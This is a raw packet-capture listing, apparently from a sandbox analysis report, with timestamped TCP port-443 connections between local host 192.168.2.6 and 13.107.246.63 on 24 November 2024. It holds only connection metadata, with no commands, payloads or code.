                                                                                                                                                                                              Nov 24, 2024 13:40:28.603334904 CET4434995013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.603409052 CET49950443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.603507996 CET49950443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.603667021 CET49950443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.603682995 CET4434995013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.603746891 CET49950443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.603751898 CET4434995013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.607436895 CET49955443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.607495070 CET4434995513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.607574940 CET49955443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.608087063 CET49955443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.608102083 CET4434995513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.726733923 CET4434995313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.727580070 CET49953443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.727607012 CET4434995313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.728064060 CET49953443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.728074074 CET4434995313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.786042929 CET4434995113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.788944960 CET4434995113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.789012909 CET49951443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.789097071 CET49951443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.789115906 CET4434995113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.789129019 CET49951443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.789134979 CET4434995113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.792392015 CET49956443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.792427063 CET4434995613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.792511940 CET49956443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.792691946 CET49956443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.792700052 CET4434995613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.932672024 CET4434995213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.932991982 CET4434995213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.933068991 CET49952443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.933135033 CET49952443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.933152914 CET4434995213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.933170080 CET49952443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.933175087 CET4434995213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.936516047 CET49957443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.936557055 CET4434995713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:28.936640978 CET49957443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.936852932 CET49957443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:28.936866045 CET4434995713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:29.170308113 CET4434995313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:29.173515081 CET4434995313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:29.173721075 CET49953443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:29.173721075 CET49953443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:29.173721075 CET49953443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:29.177288055 CET49958443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:29.177354097 CET4434995813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:29.177464962 CET49958443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:29.177664042 CET49958443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:29.177674055 CET4434995813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:29.481369972 CET49953443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:29.481394053 CET4434995313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:30.170984030 CET4434995413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:30.197180033 CET49954443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:30.197195053 CET4434995413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:30.197583914 CET49954443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:30.197587967 CET4434995413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:30.331665993 CET4434995513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:30.332180977 CET49955443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:30.332206011 CET4434995513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:30.332670927 CET49955443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:30.332678080 CET4434995513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:30.627022982 CET4434995413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:30.630136967 CET4434995413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:30.630191088 CET4434995413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:30.630227089 CET49954443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:30.630271912 CET49954443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:30.630409002 CET49954443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:30.630430937 CET4434995413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:30.630459070 CET49954443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:30.630465031 CET4434995413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:30.635251045 CET49959443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:30.635339022 CET4434995913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:30.635433912 CET49959443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:30.635695934 CET49959443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:30.635729074 CET4434995913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:30.639566898 CET4434995613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:30.640058041 CET49956443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:30.640094995 CET4434995613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:30.640714884 CET49956443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:30.640719891 CET4434995613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:30.663320065 CET4434995713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:30.663903952 CET49957443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:30.663921118 CET4434995713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:30.664482117 CET49957443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:30.664485931 CET4434995713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:30.765815020 CET4434995513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:30.765891075 CET4434995513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:30.765970945 CET49955443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:30.766275883 CET49955443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:30.766292095 CET4434995513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:30.766304970 CET49955443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:30.766309977 CET4434995513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:30.769896984 CET49960443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:30.769992113 CET4434996013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:30.770102024 CET49960443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:30.770351887 CET49960443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:30.770390034 CET4434996013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:30.958672047 CET4434995813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:30.959491968 CET49958443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:30.959532022 CET4434995813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:30.959997892 CET49958443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:30.960005045 CET4434995813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:31.091850996 CET4434995613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:31.095347881 CET4434995613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:31.095402002 CET4434995613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:31.095474005 CET49956443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:31.095676899 CET49956443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:31.095676899 CET49956443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:31.095676899 CET49956443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:31.099473000 CET49961443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:31.099535942 CET4434996113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:31.099663019 CET49961443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:31.099894047 CET49961443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:31.099920988 CET4434996113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:31.110361099 CET4434995713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:31.113508940 CET4434995713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:31.113603115 CET49957443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:31.113656044 CET49957443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:31.113672018 CET4434995713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:31.113686085 CET49957443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:31.113691092 CET4434995713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:31.116895914 CET49962443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:31.116960049 CET4434996213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:31.117037058 CET49962443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:31.117209911 CET49962443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:31.117225885 CET4434996213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:31.403198957 CET49956443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:31.403243065 CET4434995613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:31.404815912 CET4434995813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:31.408106089 CET4434995813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:31.408171892 CET4434995813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:31.408184052 CET49958443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:31.408225060 CET49958443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:31.408298969 CET49958443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:31.408313990 CET4434995813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:31.408325911 CET49958443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:31.408330917 CET4434995813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:31.411493063 CET49963443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:31.411554098 CET4434996313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:31.411639929 CET49963443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:31.411868095 CET49963443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:31.411883116 CET4434996313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:32.468123913 CET4434995913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:32.468764067 CET49959443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:32.468789101 CET4434995913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:32.469285011 CET49959443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:32.469290018 CET4434995913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:32.677169085 CET4434996013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:32.677859068 CET49960443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:32.677931070 CET4434996013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:32.678338051 CET49960443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:32.678360939 CET4434996013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:32.835253954 CET4434996113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:32.836050987 CET49961443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:32.836098909 CET4434996113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:32.836519003 CET49961443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:32.836527109 CET4434996113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:32.914977074 CET4434995913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:32.918034077 CET4434995913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:32.918226004 CET49959443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:32.918279886 CET49959443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:32.918303013 CET4434995913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:32.918315887 CET49959443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:32.918322086 CET4434995913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:32.921391010 CET49964443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:32.921441078 CET4434996413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:32.921518087 CET49964443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:32.921667099 CET49964443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:32.921680927 CET4434996413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:32.980073929 CET4434996213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:32.980787039 CET49962443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:32.980851889 CET4434996213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:32.981281042 CET49962443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:32.981300116 CET4434996213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:33.215241909 CET4434996313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:33.215828896 CET49963443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:33.215864897 CET4434996313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:33.216315985 CET49963443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:33.216321945 CET4434996313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:33.258683920 CET4434996013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:33.258837938 CET4434996013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:33.258938074 CET49960443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:33.259108067 CET49960443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:33.259141922 CET4434996013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:33.259155989 CET49960443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:33.259165049 CET4434996013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:33.264086962 CET49965443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:33.264134884 CET4434996513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:33.264223099 CET49965443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:33.264353991 CET49965443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:33.264364004 CET4434996513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:33.269727945 CET4434996113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:33.272854090 CET4434996113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:33.272954941 CET49961443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:33.272989035 CET49961443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:33.272989035 CET49961443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:33.273009062 CET4434996113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:33.273021936 CET4434996113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:33.276089907 CET49966443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:33.276135921 CET4434996613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:33.276212931 CET49966443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:33.276360035 CET49966443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:33.276371956 CET4434996613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:33.463639975 CET4434996213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:33.468105078 CET4434996213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:33.468167067 CET49962443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:33.468278885 CET49962443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:33.468305111 CET4434996213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:33.468319893 CET49962443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:33.468327999 CET4434996213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:33.471592903 CET49967443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:33.471693039 CET4434996713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:33.471782923 CET49967443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:33.471932888 CET49967443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:33.471963882 CET4434996713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:33.658159971 CET4434996313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:33.661581993 CET4434996313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:33.661674976 CET49963443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:33.661719084 CET49963443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:33.661719084 CET49963443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:33.661736965 CET4434996313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:33.661751032 CET4434996313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:33.664592981 CET49968443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:33.664621115 CET4434996813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:33.664694071 CET49968443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:33.664839029 CET49968443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:33.664851904 CET4434996813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:34.768878937 CET4434996413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:34.769469023 CET49964443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:34.769499063 CET4434996413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:34.769962072 CET49964443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:34.769970894 CET4434996413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.058233023 CET4434996613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.058984041 CET49966443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.059022903 CET4434996613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.059500933 CET49966443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.059519053 CET4434996613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.111778021 CET4434996513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.112490892 CET49965443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.112524986 CET4434996513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.112978935 CET49965443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.112984896 CET4434996513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.232834101 CET4434996413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.236001968 CET4434996413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.236069918 CET4434996413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.236160040 CET49964443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.236212015 CET49964443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.236255884 CET49964443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.236255884 CET49964443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.236291885 CET4434996413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.236323118 CET4434996413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.239666939 CET49969443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.239753008 CET4434996913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.239876986 CET49969443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.240031004 CET49969443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.240058899 CET4434996913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.266326904 CET4434996713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.267035007 CET49967443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.267115116 CET4434996713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.267432928 CET49967443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.267452955 CET4434996713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.453489065 CET4434996813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.454013109 CET49968443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.454046965 CET4434996813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.454699039 CET49968443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.454711914 CET4434996813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.501861095 CET4434996613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.505183935 CET4434996613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.505230904 CET4434996613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.505284071 CET49966443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.505368948 CET49966443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.508147955 CET49966443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.508179903 CET4434996613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.508196115 CET49966443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.508203030 CET4434996613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.511156082 CET49970443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.511220932 CET4434997013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.511297941 CET49970443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.511420965 CET49970443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.511444092 CET4434997013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.564059973 CET4434996513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.567491055 CET4434996513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.567667007 CET49965443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.569952011 CET49965443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.569952011 CET49965443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.570002079 CET4434996513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.570030928 CET4434996513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.570637941 CET49971443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.570739031 CET4434997113.107.246.63192.168.2.6
